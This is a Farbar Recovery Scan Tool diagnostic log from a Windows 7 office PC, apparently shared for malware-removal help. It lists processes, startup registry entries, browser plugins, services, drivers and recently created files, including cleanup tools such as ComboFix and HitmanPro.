(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Spotify Ltd) C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Toshiba America Information Systems, Inc.) C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtDCpl64.exe [2907240 2011-07-20] (Realtek Semiconductor Corp.)
HKLM\...\Run: [TdmNotify] => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmNotify.exe [381296 2011-12-08] (Wave Systems Corp.)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [4144944 2013-02-14] (ESET)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284480 2012-05-30] (Intel Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41336 2014-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840568 2014-05-08] (Adobe Systems Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-04-17] (Advanced Micro Devices, Inc.)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.)
HKU\S-1-5-21-462157724-132793273-1689201830-1142\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [55568 2014-08-19] (Raptr, Inc)
HKU\S-1-5-21-462157724-132793273-1689201830-1142\...\Run: [DellSystemDetect] => C:\Users\networkadmin\AppData\Local\Apps\2.0\DOV7KP1X.3TQ\BW5O2AO8.P1P\dell..tion_0f612f649c4a10af_0005.000a_17ece8424e43daec\DellSystemDetect.exe [265280 2014-08-27] (Dell)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify] => C:\Users\mike\AppData\Roaming\Spotify\Spotify.exe [6621752 2014-08-27] (Spotify Ltd)
HKU\S-1-5-21-462157724-132793273-1689201830-1165\...\Run: [Spotify Web Helper] => C:\Users\mike\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1245752 2014-08-27] (Spotify Ltd)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Call Manager.lnk
ShortcutTarget: Call Manager.lnk -> C:\Program Files (x86)\Toshiba\CallManager\CallManager.exe (Toshiba America Information Systems, Inc.)
Startup: C:\Users\mike\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Reminder.lnk
ShortcutTarget: Reminder.lnk -> G:\CheckIn\Chklogin.exe ()
ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?PC=msnHomeST&OCID=msnHomepage
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - DefaultScope {3C0697F1-7A7B-43C2-B954-2FF740A21F7C} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T29L10NSP2-23/support/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 10.0.0.2

FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\mike\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Endpoint Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-08-14]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-11]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird

Chrome:
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 CmRegService; C:\Program Files (x86)\Toshiba\CallManager\CmRegService.exe [12288 2014-01-14] (Toshiba America Information Systems, Inc.) [File not signed]
S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [40888 2013-02-14] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1020304 2013-02-14] (ESET)
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [218504 2012-01-17] ()
S3 ESHASRV; C:\Program Files\ESET\ESET NOD32 Antivirus\EShaSrv.exe [190208 2013-02-14] (ESET)
S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1055\G2AC_Service.exe [309568 2014-07-10] (Citrix Online, a division of Citrix Systems, Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166432 2012-10-22] (Intel Corporation)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2012-02-08] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2012-02-08] (Hewlett-Packard) [File not signed]
R2 SentinelProtectionServer; C:\Program Files (x86)\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe [206400 2006-12-21] (SafeNet, Inc)
S2 tcsd_win32.exe; C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1637888 2011-10-08] () [File not signed]
R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1679872 2012-01-05] (Wave Systems Corp.) [File not signed]
S3 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [198144 2012-01-16] (Wave Systems Corp.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [217000 2013-02-04] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [183016 2013-04-09] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [153200 2013-02-04] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [141304 2013-02-04] (ESET)
R3 IntcAzAudAddService; C:\Windows\System32\drivers\RTDVHD64.sys [3708776 2012-02-07] (Realtek Semiconductor Corp.)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 15:18 - 2014-08-28 15:18 - 00038660 _____ () C:\Users\mike\Desktop\HitmanPro_20140828_1518.log
2014-08-28 15:11 - 2014-08-28 15:11 - 11193392 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro_x64.exe
2014-08-28 15:10 - 2014-08-28 15:18 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-28 15:08 - 2014-08-28 15:09 - 10279800 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro.exe
2014-08-28 14:57 - 2014-08-28 14:57 - 00023791 _____ () C:\ComboFix.txt
2014-08-28 14:35 - 2014-08-28 14:57 - 00000000 ____D () C:\Qoobox
2014-08-28 14:35 - 2014-08-28 14:56 - 00000000 ____D () C:\Windows\erdnt
2014-08-28 14:35 - 2011-06-25 23:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-28 14:35 - 2010-11-07 10:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-28 14:35 - 2009-04-19 21:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-28 14:35 - 2000-08-30 17:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-28 14:33 - 2014-08-28 14:34 - 05574834 ____R (Swearware) C:\Users\mike\Desktop\ComboFix.exe
2014-08-28 14:19 - 2014-08-28 15:20 - 00014924 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 14:19 - 2014-08-28 14:20 - 00039005 _____ () C:\Users\mike\Desktop\Addition.txt
2014-08-28 14:18 - 2014-08-28 15:20 - 00000000 ____D () C:\FRST
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 13:58 - 2014-08-28 14:01 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 13:58 - 2014-08-28 14:00 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 15:04 - 2014-08-27 15:09 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:54 - 2014-08-28 13:51 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-27 14:54 - 2014-08-27 14:55 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:53 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:51 - 2014-08-27 14:27 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:21 - 2014-08-27 13:29 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:06 - 2014-08-27 13:07 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:03 - 2014-08-27 13:20 - 00000000 ____D () C:\temp
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 11:50 - 2014-08-27 12:07 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-27 11:50 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-27 11:50 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:36 - 2014-08-21 09:37 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-06-04 06:59 - 00041472 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\agphlink.tsp
2014-08-21 09:36 - 2013-06-04 06:58 - 00220672 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\intrtspi.tsp
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:35 - 2013-10-16 09:08 - 00131155 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\gtapiocx.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00081920 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DumpWin.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00069632 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\playrec.ocx
2014-08-21 09:35 - 2013-10-16 09:08 - 00061440 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\CTSMail.dll
2014-08-21 09:35 - 2013-10-16 09:08 - 00040960 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\DDEWrap.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00127037 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\eClient.ocx
2014-08-21 09:35 - 2013-06-04 07:16 - 00053306 _____ (Toshiba America Information Systems, Inc.) C:\Windows\SysWOW64\sock.ocx
2014-08-21 09:35 - 2011-11-16 07:59 - 00000408 _____ () C:\Windows\SysWOW64\eClient.lic
2014-08-21 09:35 - 2009-11-05 08:20 - 00626688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr80.dll
2014-08-21 09:35 - 2009-11-05 08:20 - 00000414 _____ () C:\Windows\SysWOW64\gtapiocx.lic
2014-08-21 09:35 - 2006-03-13 14:28 - 00368912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbar332.dll
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:33 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:32 - 2014-08-21 09:33 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-21 09:32 - 2014-02-07 03:01 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Microsoft Help
2014-08-21 09:32 - 2009-07-13 21:54 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-08-21 09:32 - 2009-07-13 21:49 - 00000000 ___RD () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-06 03:04 - 2014-03-24 19:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-08-06 03:04 - 2014-03-24 19:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-08-06 03:03 - 2014-06-17 19:18 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2014-08-06 03:03 - 2014-06-17 18:51 - 00646144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe
2014-08-06 03:03 - 2014-06-17 18:10 - 03157504 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-06 03:02 - 2014-06-06 03:10 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-08-06 03:02 - 2014-06-06 02:44 - 00509440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-08-06 03:02 - 2014-05-29 23:45 - 00497152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-08-06 03:01 - 2014-06-06 19:42 - 02148352 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 19:42 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 19:41 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-08-06 03:01 - 2014-06-06 19:40 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-06 03:01 - 2014-06-06 15:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-08-06 03:01 - 2014-06-06 15:54 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 01796096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-08-06 03:01 - 2014-06-06 15:53 - 00073728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-08-06 03:01 - 2014-06-06 15:52 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-08-06 03:01 - 2014-03-04 02:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
